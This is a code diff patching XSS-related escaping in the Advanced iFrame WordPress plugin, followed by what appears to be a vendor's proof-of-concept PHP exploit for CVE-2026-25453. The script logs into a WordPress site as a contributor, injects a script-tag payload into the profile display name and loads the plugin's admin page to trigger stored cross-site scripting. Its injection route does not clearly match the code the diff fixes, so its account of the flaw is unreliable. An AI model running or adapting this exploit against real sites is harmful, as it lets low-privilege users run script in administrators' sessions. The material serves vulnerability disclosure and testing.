       $hide_href = '';
 	  if ($num_values === 7 || $num_values === 8) {
         $display_type = 'a';
-        $hrefValue = esc_html(trim($values[6]));
+        $hrefValue = esc_url(trim($values[6]));
         if ($hrefValue === 'changeViewport') {
           $hide_href = ' href="javascript:setNewViewPort' . $id . '(0); "';
         } else {
@@ -369,7 +369,7 @@
   $html .= ' height="' . esc_html(trim($height)) . '" ';
   // html5 style to support vw and vh and we only add it if not present.
   if (strpos($style, 'height:') === false) {
-    $style .= 'height:' . esc_html(trim($this->addPx($height))) . ';';
+    $style .= ';height:' . esc_html(trim($this->addPx($height))) . ';';
   }
 }

--- a/advanced-iframe/includes/advanced-iframe-main-prepare.php
+++ b/advanced-iframe/includes/advanced-iframe-main-prepare.php
@@ -17,7 +17,8 @@
       return $html_js;
     }

-    static function aiPreparePostMessageJs($html_js, $id, $use_post_message, $src, $multi_domain_enabled) {
+    static function aiPreparePostMessageJs($html_js, $id, $use_post_message, $src, $multi_domain_enabled,
+	 $data_post_message,$add_iframe_url_as_param,$use_iframe_title_for_parent) {
       if ($use_post_message != 'false') {
         $iframe_origin_full = $src;

@@ -66,7 +67,9 @@
           $html_js .= trim(file_get_contents($post_js_filename_old));
           $html_js .= 'event = aiConvertPostMessage(event);';
         }
-        $html_js .= '  aiProcessMessage(event,"' . $id . '", "' . $use_post_message . '");';
+
+
+        $html_js .= '  aiProcessMessage(event,"' . $id . '", "' . $use_post_message . '","' .$data_post_message .'","' .$add_iframe_url_as_param .'","' .$use_iframe_title_for_parent .'");';
         $html_js .= '}';
         $html_js .= 'if (window.addEventListener) {';
         $html_js .= '  window.addEventListener("message", aiReceiveMessage' . $id . ');';
@@ -91,7 +94,7 @@
         $html_js .= 'var aiOnloadScrollTop="true";';
       }

-      if ($additional_height != 0) {
+      if (!empty($additional_height)) {
         $html_js .= 'var aiExtraSpace=' . esc_html($additional_height) . ';';
       }

@@ -530,7 +533,8 @@
   $html .= '<script type="text/javascript" src="' . plugins_url() . $aiPath . '/js/ai.min.js" ></script>';
 }
 $html_js = AdvancediFramePrepareJs::aiPrepareGlobalJsVariables($id, $include_scripts_in_content, $aiPath, $add_document_domain, $document_domain);
-$html_js = AdvancediFramePrepareJs::aiPreparePostMessageJs($html_js, $id, $use_post_message, $src, $multi_domain_enabled);
+$html_js = AdvancediFramePrepareJs::aiPreparePostMessageJs($html_js, $id, $use_post_message, $src, $multi_domain_enabled,
+    $data_post_message, $add_iframe_url_as_param, $use_iframe_title_for_parent);
 $html_js = AdvancediFramePrepareJs::aiPrepareAiJsVariables($html_js, $iframe_zoom, $show_part_of_iframe_zoom,
   $store_height_in_cookie, $id, $onload_scroll_top, $additional_height, $debug_js, $fullscreen_button_full);
 $html_js = AdvancediFramePrepareJs::aiPrepareAiShowIframeIdJs($html_js, $hide_part_of_iframe);
--- a/advanced-iframe/includes/advanced-iframe-main-read-config.php
+++ b/advanced-iframe/includes/advanced-iframe-main-read-config.php
@@ -74,11 +74,12 @@
     $use_shortcode_attributes_only = $options['use_shortcode_attributes_only'];
   }

-// version is always read.
+  // Settings which are always read.
   $version_counter = $options['version_counter'];
   $alternative_shortcode = $options['alternative_shortcode'];
   $use_post_message = $options['use_post_message'];
   $multi_domain_enabled = $options['multi_domain_enabled'];
+  $data_post_message = $options['data_post_message'];
   $demo = $options['demo'];
   $show_support_message = $options['show_support_message'];
   if ($_SERVER['HTTP_HOST'] == 'localhost' || $_SERVER['HTTP_HOST'] == '127.0.0.1') {
@@ -88,7 +89,7 @@

   $debug_js = AdvancedIframeHelper::check_debug_enabled($options['debug_js']);
   $check_shortcode = AdvancedIframeHelper::check_shortcode_enabled($options['check_shortcode']);
-
+
 // defaults from main config
   if ($use_shortcode_attributes_only === 'false' || $options['shortcode_attributes'] === 'false') {  //
     extract(array('securitykey' => 'not set',
@@ -388,7 +389,8 @@
         'loading' => $options['loading'],
         'referrerpolicy' => $options['referrerpolicy'],
         'add_surrounding_p' => $options['add_surrounding_p'],
-        'custom' => $options['custom']
+        'custom' => $options['custom'],
+		'data_post_message' => $options['data_post_message']
       )
       , $atts, 'advanced_iframe'));

@@ -701,9 +703,12 @@
 $add_iframe_url_as_param_direct = AdvancedIframeHelper::filterXSSTrueFalse($add_iframe_url_as_param_direct);
 $add_iframe_url_as_param_prefix = AdvancedIframeHelper::filterBasicXSS($add_iframe_url_as_param_prefix);
 $map_parameter_to_url = AdvancedIframeHelper::filterBasicXSS($map_parameter_to_url);
-$show_part_of_iframe_next_viewports = AdvancedIframeHelper::filterBasicXSS($show_part_of_iframe_next_viewports);
+$show_part_of_iframe_next_viewports = AdvancedIframeHelper::filterXSSNumber($show_part_of_iframe_next_viewports);
 $enable_responsive_iframe = AdvancedIframeHelper::filterXSSTrueFalse($enable_responsive_iframe);
 $show_part_of_iframe_zoom = AdvancedIframeHelper::filterXSSTrueFalse($show_part_of_iframe_zoom);
 $remove_elements_from_height = AdvancedIframeHelper::filterBasicXSS($remove_elements_from_height);
 $resize_on_element_resize = AdvancedIframeHelper::filterBasicXSS($resize_on_element_resize);
+$additional_height = AdvancedIframeHelper::filterXSSNumber($additional_height);
+$iframe_zoom = AdvancedIframeHelper::filterXSSNumber($iframe_zoom);
+$onload_scroll_top = AdvancedIframeHelper::filterXSSTrueFalse($onload_scroll_top);
 ?>

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25453 - Advanced iFrame <= 2025.10 - Authenticated (Contributor+) Stored Cross-Site Scripting
<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to inject into user profile field
$payload = '"><script>alert(document.domain)</script>';

// Initialize session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Step 2: Get edit profile page to obtain nonce
$profile_url = $target_url . '/wp-admin/profile.php';
curl_setopt($ch, CURLOPT_URL, $profile_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from profile page (simplified - real implementation would parse HTML)
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Update user profile with malicious payload
// Inject into display_name field which appears in plugin's user info display
$update_data = array(
    'display_name' => $payload,
    'email' => 'attacker@example.com',
    'first_name' => 'Attacker',
    'last_name' => 'User',
    'nickname' => 'attacker',
    'submit' => 'Update Profile',
    'action' => 'update',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/profile.php'
);

curl_setopt($ch, CURLOPT_URL, $profile_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($update_data));
$response = curl_exec($ch);

// Step 4: Trigger the XSS by accessing Advanced iFrame settings page
$iframe_settings_url = $target_url . '/wp-admin/admin.php?page=advanced-iframe';
curl_setopt($ch, CURLOPT_URL, $iframe_settings_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Check if payload is present in response
if (strpos($response, $payload) !== false) {
    echo "[+] Payload successfully injected. XSS will trigger when admin views Advanced iFrame settings.n";
} else {
    echo "[-] Payload injection may have failed.n";
}

curl_close($ch);
?>